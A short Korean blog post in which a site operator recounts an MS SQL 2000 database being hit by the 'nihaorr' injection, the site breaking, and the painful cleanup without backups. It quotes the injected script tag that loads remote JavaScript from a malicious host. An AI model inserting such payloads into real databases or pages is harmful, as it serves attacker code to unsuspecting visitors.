Windows2003 서버에 SQL 2000 - nihaorr script 공격때문에 난리났었어요!!!

오늘 아주 난리가 났었다. Widnows 2003서버에 있는 SQL2000가 테러 당한 것.
50자 이상 되는 field들에 글자들에 강제로 script src=http://www.nihaorr<script src=http://www.nihaorr1.com/1.js 이런 식의 글자들이 들어와 박혔다.

사이트가 엉망이 되었다. 페이지는 안 뜨고 무슨 중국어 문자팩 깔라는 alert페이지만 엄천 뜨다가 웹브라우저가 죽었다.

게다가 더 큰 문제는 DB 백업을 하나도 받아놓지 않았다는 점.

테러당한 테이블에서 일일이 저 요사시런 글자들은 다 지우느라고 고생했고, laptop cordinator는 주요 고객 사이트에 front 데이터를  다 채워넣느라고 고생했다.

어떤 식으로 통로가 뚫려서 저 글자들이 DB field에 강제로 박혔는지 알 수가 없다.
검색해보면 피해본 사이트가 천지에 깔려있는데 대책이 없다. MS SQL에 심각한 문제가 있는거 같은데!! 대책을 적어놓은 곳은 없다. 혹시 DB 백업 안 받아놓은 MS-SQL 사용 사이트들은 조심하셔야 할듯..